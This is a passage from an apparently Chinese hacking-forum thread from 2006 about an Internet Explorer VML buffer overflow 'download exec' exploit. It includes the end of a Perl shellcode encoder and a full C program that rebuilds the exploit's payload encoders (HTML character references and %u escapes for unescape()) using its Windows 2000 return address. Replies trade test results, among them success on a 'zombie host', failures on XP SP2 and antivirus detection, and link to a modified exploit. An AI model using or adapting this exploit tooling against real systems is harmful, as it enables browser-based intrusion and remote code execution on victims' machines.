        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);   
      }
      $idx += 2;
   }
   
   return $code;
}
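Added example (my code, not from either original post): vml.c's convert2ncr() in the first post and this Perl script's convert_shellcode() (Metasploit's JSUnescape) do the same job. Both take the payload two bytes at a time and emit one little-endian 16-bit code unit, the former as HTML numeric character references (&#NNNNN;) inside the method attribute, the latter as %uXXXX escapes for JavaScript unescape(). The C below reimplements both encoders and adds the parser side (references back to UTF-16LE bytes) to show that the bytes, including a double quote and CR/LF that would end or break a raw attribute value, arrive in memory in order. All inputs are constructed; the 0x90 pad for an odd length mirrors vml.c's 0x90-filled buffer, and the repeat-last-byte pad mirrors the Perl function.

```c
/* ncr_pack.c - added example, not from the original posts.
 * Two encoders for packing bytes into 16-bit code units plus a decoder that
 * models what the HTML parser does with numeric character references. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PAD_BYTE 0x90   /* vml.c memset()s its buffer to 0x90, so a trailing
                           odd byte gets paired with a NOP */

/* Encode n bytes as &#NNNNN; references, little-endian pairs (vml.c style).
 * Returns chars written (excluding the NUL) or 0 if out is too small. */
size_t bytes_to_ncr(const uint8_t *in, size_t n, char *out, size_t cap)
{
    size_t used = 0;
    for (size_t i = 0; i < n; i += 2) {
        unsigned lo = in[i];
        unsigned hi = (i + 1 < n) ? in[i + 1] : PAD_BYTE;
        int w = snprintf(out + used, cap - used, "&#%u;", (hi << 8) | lo);
        if (w < 0 || (size_t)w >= cap - used) return 0;
        used += (size_t)w;
    }
    return used;
}

/* Same pairing as %uXXXX for JavaScript unescape(); Metasploit's JSUnescape
 * pads an odd length by repeating the last byte, reproduced here. */
size_t bytes_to_js_unescape(const uint8_t *in, size_t n, char *out, size_t cap)
{
    size_t used = 0;
    for (size_t i = 0; i < n; i += 2) {
        unsigned lo = in[i];
        unsigned hi = (i + 1 < n) ? in[i + 1] : in[i];
        int w = snprintf(out + used, cap - used, "%%u%02x%02x", hi, lo);
        if (w < 0 || (size_t)w >= cap - used) return 0;
        used += (size_t)w;
    }
    return used;
}

/* Parser side: a run of &#N; references back to UTF-16LE bytes.
 * Returns bytes written, 0 on malformed input or overflow. */
size_t ncr_to_utf16le(const char *s, uint8_t *out, size_t cap)
{
    size_t n = 0;
    while (*s) {
        if (s[0] != '&' || s[1] != '#') return 0;
        char *end;
        unsigned long v = strtoul(s + 2, &end, 10);
        if (end == s + 2 || *end != ';' || v > 0xFFFF) return 0;
        if (n + 2 > cap) return 0;
        out[n++] = (uint8_t)(v & 0xFF);   /* low byte first: little-endian */
        out[n++] = (uint8_t)(v >> 8);
        s = end + 1;
    }
    return n;
}

/* 1 if encoding then decoding reproduces the input (plus one pad byte when
 * n is odd), i.e. the bytes survive the trip through the attribute value. */
int ncr_roundtrip(const uint8_t *in, size_t n)
{
    char enc[8192];
    uint8_t dec[1024];
    if (n == 0 || n > sizeof dec - 1) return 0;
    if (bytes_to_ncr(in, n, enc, sizeof enc) == 0) return 0;
    size_t got = ncr_to_utf16le(enc, dec, sizeof dec);
    if (got != n + (n & 1)) return 0;
    if (memcmp(dec, in, n) != 0) return 0;
    return (n & 1) ? dec[n] == PAD_BYTE : 1;
}

int main(void)
{
    /* constructed: vml.c's win2k return address 0x7800CCDD little-endian,
       then a double quote and CR/LF, bytes that would end or break a raw
       attribute value but are harmless as references */
    const uint8_t sample[] = {0xDD, 0xCC, 0x00, 0x78, '"', 0x0D, 0x0A};
    char ncr[128], js[128];
    bytes_to_ncr(sample, sizeof sample, ncr, sizeof ncr);
    bytes_to_js_unescape(sample, sizeof sample, js, sizeof js);
    printf("NCR: %s\nJS : %s\nroundtrip: %s\n", ncr, js,
           ncr_roundtrip(sample, sizeof sample) ? "ok" : "FAIL");
    return 0;
}
```

Build with `cc -o ncr_pack ncr_pack.c`. The four-byte return address 0x7800CCDD becomes `&#52445;&#30720;` and `%uccdd%u7800`; note that vml.c reads one byte past psize when psize is odd, which is harmless only because its buffer was pre-filled with 0x90, the same pad this encoder applies explicitly.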


No effect on XP
~~~
Why do some 2000 machines work
and some don't?
What's the problem there?


The PERL version seems to get detected by antivirus!
I personally think the program also has problems! Opening it in Notepad shows garbled text!


Tested 笔头's version; it succeeded. The calculator popped up.
QHK-EST-Evil Octal: people who live for technology, thirst to study the beauty of technology, and forever chase the summit of technology!!!


Quote:
Quoting post #0 by zhuwg, 2006-09-21 12:27: [Original] Another wild horse: Internet Explorer VML Buffer Overflow Download Exec Exploit
Source: Evil Octal Information Security Team (www.eviloctal.com)


We recommend using gyzy's modified version first:
http://forum.eviloctal.com/read-htm-tid-24858.html
.......
zhuwg, which alt account are you on nop's site????
H.U.C For Ever


Tested successfully on one 2K zombie host.
...


No response on XP SP2.
...
Continuing to test other environments.


On XP SP2 with IE6.0 I got an error.
Hope someone puts out one that works on XP.
